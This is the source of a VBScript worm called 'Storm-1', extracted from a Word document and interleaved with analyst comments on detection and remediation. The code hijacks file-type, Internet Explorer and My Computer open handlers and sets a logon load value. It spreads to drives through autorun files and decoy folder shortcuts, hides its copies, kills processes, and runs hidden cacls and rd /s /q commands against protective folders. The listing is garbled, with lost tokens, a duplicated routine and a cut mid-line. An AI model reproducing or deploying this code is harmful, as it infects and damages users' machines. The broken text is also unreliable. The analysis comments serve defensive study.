暴风一号源码.docx
暴风一号源码
' Script entry: suppresses runtime errors, creates two COM helper objects, then calls main().
' NOTE(review): this listing was extracted from a .docx; whitespace and the ProgID strings
' passed to createobject are missing, so the text is not runnable as shown.
onerrorresumenext
dimfso,wshshell
setfso=createobject("")
setwshshell=createobject("")
callmain()
' main: joins the command-line arguments into param and dispatches on its last three
' characters (lower-cased). Every named case runs the command held in runpath, then calls
' invadesystem and launches the copy under %systemroot%\system\.
' The suffixes "oie", "omc", "emc" and "dir" match the arguments this script appends to the
' hijacked open commands (see invadesystem) and to the planted folder shortcuts (see
' infectroot), so these branches fire when a user opens a hijacked file type, Internet
' Explorer, My Computer or one of those shortcuts: the expected action still happens,
' which hides the re-infection step from the user.
' NOTE(review): several expressions lost tokens in extraction (the argument source, the
' program names inside runpath); do not read any statement here as complete.
submain()
onerrorresumenext
dimargs,virusload,virusass
setargs=
virusload=getmainvirus
(1)
virusass=getmainvirus(0)
argnum=0
dowhileargnum<
param=param&""&args(argnum)
argnum=argnum+1
loop
subparam=lcase(right(param,3))
selectcasesubparam
case"run"
runpath=left,2)
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
' Text-like types: the original file is opened from a system32 program (name lost) first.
case"txt","log","ini","inf"
runpath="%systemroot%\system32\"¶m
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
' Batch files are not executed; a fixed echo/pause command is shown instead.
case"bat","cmd"
runpath="cmd/cechohi!
i'mhere!
&pause"
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"reg"
runpath=""&""""&trim(param)&""""
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"chm"
runpath=""&""""&trim(param)&""""
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"hlp"
runpath=""&""""&trim(param)&""""
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
' "dir": strips the three-character suffix and opens the remaining path, i.e. the real
' folder behind a planted shortcut.
case"dir"
runpath=""""&left(trim(param),len(trim(param))-3)&""""
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"oie"
runpath="""%programfiles%\internetexplorer\"""
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"omc"
runpath="/n,:
:
{20d04fe0-3aea-1069-a2d8-08002b30309d}"
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
case"emc"
runpath="/n,/e,:
:
{20d04fe0-3aea-1069-a2d8-08002b30309d}"
callrun(runpath)
callinvadesystem(virusload,virusass)
callrun("%systemroot%\system\"&virusload)
' Default branch (no recognised suffix): this is the resident instance. It computes the
' number of weeks since the recorded infection date minus 12; when that is positive and
' the month number equals the day number it calls virusalert and makejoke. It then
' enters monitorsystem regardless.
' NOTE(review): the body of the predblinstance check is empty in this extraction.
caseelse
ifpredblinstance=truethen
endif
timeout=datediff("ww",getinfecteddate,date)-12
iftimeout>0andmonth(date)=day(date)then
callvirusalert()
callmakejoke(cint(month(date)))
endif
callmonitorsystem()
endselect
endsub
' monitorsystem: endless loop that calls killprocess on a fixed list of process names,
' re-applies invadesystem, and calls keepprocess for the main script.
' The seven process names are empty strings in this extraction. The bare "3000" is
' presumably the argument of a sleep call whose name was lost - TODO confirm.
' Remediation note: because the registry and file changes are re-asserted on every pass,
' reverting them while an instance is still running will not hold; the script-host
' processes have to be stopped first.
submonitorsystem()
onerrorresumenext:
dimprocessnames,exefullnames
processnames=array("","","","","","","")
vbsfullnames=array(getmainvirus
(1))
do
callkillprocess(processnames)
callinvadesystem(getmainvirus
(1),getmainvirus(0))
callkeepprocess(vbsfullnames)
3000
loop
endsub
' invadesystem: (re)installs the script and its persistence. Visible effects:
'   - for each drive passing a type check (condition partly lost), calls createautorun and
'     infectroot with a file name built from getserialnumber plus ".vbs";
'   - writes the script body (getcode) to virusasspath and virusloadpath, copies a host
'     file to a \system\ directory and, in the non-NTFS branch, marks the files hidden;
'   - sets three values under HKCU ...\Windows NT\CurrentVersion\Windows: "load" (run at
'     logon), plus "ver" and "date" as infection markers;
'   - rewrites shell\open\command for txtfile, inifile, inffile, batfile, cmdfile, regfile,
'     hlpfile and one class whose name was lost (handled by setchmfileass), plus the open
'     commands for Internet Explorer and for CLSIDs {871c5380-...} and {20d04fe0-...};
'   - calls regset.
' Triage note: every one of the registry locations above is a detection point; a
' shell\open\command value that routes through a script host to a .vbs under system32 is
' the indicator this block produces.
' NOTE(review): the drive enumeration source, the file-exists calls and part of the
' version comparison were lost in extraction, and the outer "if" is fused with the
' file-system check on one line.
subinvadesystem(virusloadpath,virusasspath)
onerrorresumenext
dimload_value,file_value,ie_value,mycpt_value1,mycpt_value2,hcuload,hcuver,viruscode,version
' Command strings written into the hijacked handlers; the trailing token ("%1%*", "oie",
' "omc", "emc") is what main later dispatches on.
load_value=""""&virusloadpath&""""
file_value="%systemroot%\system32\"&""""&virusasspath&""""&"%1%*"
ie_value="%systemroot%\system32\"&""""&virusasspath&""""&"oie"
mycpt_value1="%systemroot%\system32\"&""""&virusasspath&""""&"omc"
mycpt_value2="%systemroot%\system32\"&""""&virusasspath&""""&"emc"
hcuload="hkey_current_user\software\microsoft\windowsnt\currentversion\windows\load"
hcuver="hkey_current_user\software\microsoft\windowsnt\currentversion\windows\ver"
hcudate="hkey_current_user\software\microsoft\windowsnt\currentversion\windows\date"
viruscode=getcode
version=1
hostsourcepath=
(1)&"\"
hostfilepath=(0)&"\system\"
foreachdrivein
ifand=1or=2or=3)then
diskvirusname=getserialnumber&".vbs"
callcreateautorun,diskvirusname)
callinfectroot,diskvirusname)
endif
next
if(virusasspath)=falseor(virusloadpath)=falseor(hostfilepath)=falseorgetversion()ifgetfilesystemtype(getsystemdrive())="ntfs"then
callcreatefile(viruscode,virusasspath)
callcreatefile(viruscode,virusloadpath)
callcopyfile(hostsourcepath,hostfilepath)
callsethiddenattr(hostfilepath)
else
callcreatefile(viruscode,virusasspath)
callsethiddenattr(virusasspath)
callcreatefile(viruscode,virusloadpath)
callsethiddenattr(virusloadpath)
callcopyfile(hostsourcepath,hostfilepath)
callsethiddenattr(hostfilepath)
endif
endif
' Persistence and infection markers under HKCU; each is written only when it differs or
' is missing.
ifreadreg(hcuload)<>load_valuethen
callwritereg(hcuload,load_value,"")
endif
ifgetversion()callwritereg(hcuver,version,"")
endif
ifgetinfecteddate()=""then
callwritereg(hcudate,date,"")
endif
' File-association hijack: each handler is compared with the expected value and rewritten
' when it differs, so a manual repair is undone on the next pass of monitorsystem.
ifreadreg("hkey_local_machine\software\classes\txtfile\shell\open\command\")<>file_valuethen
callsettxtfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\inifile\shell\open\command\")<>file_valuethen
callsetinifileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\inffile\shell\open\command\")<>file_valuethen
callsetinffileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\batfile\shell\open\command\")<>file_valuethen
callsetbatfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\cmdfile\shell\open\command\")<>file_valuethen
callsetcmdfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\regfile\shell\open\command\")<>file_valuethen
callsetregfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\\shell\open\command\")<>file_valuethen
callsetchmfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\hlpfile\shell\open\command\")<>file_valuethen
callsethlpfileass(virusasspath)
endif
ifreadreg("hkey_local_machine\software\classes\applications\\shell\open\command\")<>ie_valuethen
callsetieass(virusasspath)
endif
ifreadreg("hkey_classes_root\clsid\{871c5380-42a0-1069-a2ea-08002b30309d}\shell\openhomepage\command\")<>ie_valuethen
callsetieass(virusasspath)
endif
ifreadreg("hkey_classes_root\clsid\{20d04fe0-3aea-1069-a2d8-08002b30309d}\shell\open\command\")<>mycpt_value1then
allsetmycomputerass(virusasspath)
endif
ifreadreg("hkey_classes_root\clsid\{20d04fe0-3aea-1069-a2d8-08002b30309d}\shell\explore\command\")<>mycpt_value2then
callsetmycomputerass(virusasspath)
endif
callregset()
endsub
' copyfile: if the destination already exists it is removed first (the "true" argument is
' presumably a force flag - the method name was lost), then source is copied to pathf.
' Errors are suppressed, so a failed copy is silent.
subcopyfile(source,pathf)
onerrorresumenext
if(pathf)then
pathf,true
endif
source,pathf
endsub
' createfile: writes the string in code to pathf. Both branches open the path with mode 2;
' the third argument is false when the file already exists and true otherwise.
' NOTE(review): the open and write method names were lost in extraction; mode 2 is
' presumably "for writing" - TODO confirm against the original document.
subcreatefile(code,pathf)
onerrorresumenext
dimfiletext
if(pathf)then
setfiletext=(pathf,2,false)
code
else
setfiletext=(pathf,2,true)
code
endif
endsub
' createfile (second copy): identical, line for line, to the definition directly above it
' in this listing; it writes the string in code to pathf, opening with mode 2.
' NOTE(review): whether the duplicate is in the original sample or an artefact of the
' document it was pasted into cannot be told from this page.
subcreatefile(code,pathf)
onerrorresumenext
dimfiletext
if(pathf)then
setfiletext=(pathf,2,false)
code
else
setfiletext=(pathf,2,true)
code
endif
endsub
' regset: tampers with four Explorer-related registry settings:
'   - ...\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue is set to 3 and
'     ...\Hidden\SHOWALL\CheckedValue to 2, which interferes with Explorer's
'     "show hidden files" option so the hidden copies stay out of sight;
'   - HKCU ...\Policies\Explorer\NoDriveTypeAutoRun is set to 0, leaving AutoRun
'     enabled for every drive type;
'   - HKCR\lnkfile\IsShortcut is deleted, which removes the shortcut arrow overlay so the
'     planted .lnk files look like ordinary folders.
' Remediation note: all four values need to be compared with a known-good baseline and
' restored; removing the script files alone leaves these changes in place.
subregset()
onerrorresumenext
dimregpath1,regpath2,regpath3,regpath4
regpath1="hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\nohidden\checkedvalue"
regpath2="hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall\checkedvalue"
regpath3="hkey_current_user\software\microsoft\windows\currentversion\policies\explorer\nodrivetypeautorun"
regpath4="hkey_classes_root\lnkfile\isshortcut"
callwritereg(regpath1,3,"reg_dword")
callwritereg(regpath2,2,"reg_dword")
callwritereg(regpath3,0,"reg_dword")
calldeletereg(regpath4)
endsub
' killprocess: for every name in processnames, queries Win32_Process through WMI
' (root\cimv2) and acts on each match; when the first attempt returns non-zero it falls
' back to launching a hidden "cmd /c ntsd -c q -p" command.
' NOTE(review): the WMI method call and the value appended after "-p" were lost in
' extraction; presumably a terminate call and the process id - TODO confirm.
' Detection note: a script host spawning cmd with an ntsd "-c q -p" command line is an
' unusual parent/child pair and a usable behavioural indicator.
subkillprocess(processnames)
onerrorresumenext
setwmiservice=getobject("winmgmts:
\\.\root\cimv2")
foreachprocessnameinprocessnames
setprocesslist=("select*fromwin32_processwherename='"&processname&"'")
foreachprocessinprocesslist
intreturn=
ifintreturn<>0then
"cmd/cntsd-cq-p"&,vbhide,false
endif
next
next
endsub
' killimmunity: builds a folder path at the root of drive d and, if that folder exists,
' runs two hidden commands: cacls granting Everyone full control recursively, then
' rd /s /q to delete it.
' NOTE(review): the folder name was lost in extraction; going by the routine's name and
' its caller createautorun, it is presumably the directory that USB "immunisation" tools
' create to block an autorun file - TODO confirm.
' Detection note: cacls followed by rd /s /q against a removable-drive root, launched
' hidden from a script host, is worth alerting on.
subkillimmunity(d)
onerrorresumenext
immunityfolder=d&":
\"
if(immunityfolder)then
("cmd/ccacls"&""""&immunityfolder&""""&"/t/e/c/geveryone:
f"),vbhide,true
("cmd/crd/s/q"&immunityfolder),vbhide,true
endif
endsub
' keepprocess: watchdog. For each script name, if vbsprocesscount reports fewer than two
' running instances, another one is launched from %systemroot%\system\.
' Remediation note: since each instance restarts the other, all instances have to be
' terminated together.
subkeepprocess(vbsfullnames)
onerrorresumenext
foreachvbsfullnameinvbsfullnames
ifvbsprocesscount(vbsfullname)<2then
run("%systemroot%\system\"&vbsfullname)
endif
next
endsub
' writereg: writes value to registry path strkey through a freshly created COM object,
' passing vtype as the value type when it is not the empty string.
' Unlike most routines in this listing it does not suppress errors itself.
' NOTE(review): the ProgID and the write method name were lost in extraction.
subwritereg(strkey,value,vtype)
dimtmps
settmps=createobject("")
ifvtype=""then
strkey,value
else
strkey,value,vtype
endif
settmps=nothing
endsub
' deletereg: removes the registry entry at strkey through a freshly created COM object.
' NOTE(review): the ProgID and the delete method name were lost in extraction.
subdeletereg(strkey)
dimtmps
settmps=createobject("")
strkey
settmps=nothing
endsub
' sethiddenattr: obtains an object for path (two lookups that read identically after
' extraction, presumably one for a file and one for a folder) and assigns 6 to one of its
' properties.
' NOTE(review): the property name was lost; if it is the attributes property, 6 is
' Hidden + System, which keeps the item out of a default Explorer view - TODO confirm.
subsethiddenattr(path)
onerrorresumenext
dimvf
setvf=(path)
setvf=(path)
=6
endsub
' run: launches exefullname through a locally created shell object (this local wshshell
' shadows the script-level variable of the same name) and releases the object.
' NOTE(review): the object creation call and the run method name were lost in extraction.
subrun(exefullname)
onerrorresumenext
dimwshshell
setwshshell=("")
exefullname
setwshshell=nothing
endsub
' infectroot: spreads to the root of drive d.
'   1. Writes the script body to <d>:\<virusname> if absent and marks it hidden.
'   2. For every subfolder of the drive root: marks the folder hidden and creates (or
'      replaces, when its target differs) a .lnk at the root whose target is the dropped
'      script and whose arguments are the folder path followed by "\dir".
' Opening such a shortcut therefore starts the script, which main's "dir" branch answers
' by opening the real folder.
' Triage note: on a suspect removable drive, look for root-level .lnk files whose target
' is a .vbs at the drive root, next to same-named folders that have been hidden.
' NOTE(review): the exists/delete calls and the subfolder name property were lost in
' extraction.
subinfectroot(d,virusname)
onerrorresumenext
dimvbscode
vbscode=getcode
vbspath=d&":
\"&virusname
if(vbspath)=falsethen
callcreatefile(vbscode,vbspath)
callsethiddenattr(vbspath)
endif
setfolder=(d&":
\")
setsubfolders=
foreachsubfolderinsubfolders
sethiddenattr
lnkpath=d&":
\"&&".lnk"
targetpath=d&":
\"&virusname
args=""""&d&":
\"&&"\dir"""
if(lnkpath)=falseorgettargetpath(lnkpath)<>targetpaththen
if(lnkpath)=truethen
lnkpath,true
endif
callcreateshortcut(lnkpath,targetpath,args)
endif
next
endsub
' createshortcut: creates a shortcut at lnkpath with the given target and arguments,
' window style 4, and icon index 3 taken from a file under %systemroot%\system32\
' (file name lost in extraction; presumably chosen so the shortcut shows a folder icon).
' This routine does not suppress errors itself.
subcreateshortcut(lnkpath,targetpath,args)
setshortcut=(lnkpath)
withshortcut
.targetpath=targetpath
.arguments=args
.windowstyle=4
.iconlocation="%systemroot%\system32\,3"
.save
endwith
endsub
subcreateautorun(d,virusname)
onerrorresumenext
diminfpath,vbspath,vbscode
infpath=d&":
\"
vbspath=d&":
\"&virusname
vbscode=getcode
if(infpath)=falseor(vbspath)=falsethen
callcreatefile(vbscode,vbspath)
callsethiddenattr(vbspath)
strinf="[autorun]"&vbcrlf&"shellexecute="&virusname&"""autorun"""&vbcrlf&"shell\open=′ò?
a(&o)"&vbcrlf&"shell\open\command="&virusname&"""autorun"""&vbcrlf&"shell\open\default=1"&vbcrlf&"shell\explore=×ê?
′1üàí?
÷(&x)"&vbcrlf&"shell\explore\command="&virusname&"""autorun"""
callkillimmunity(d)
callcreatefile(s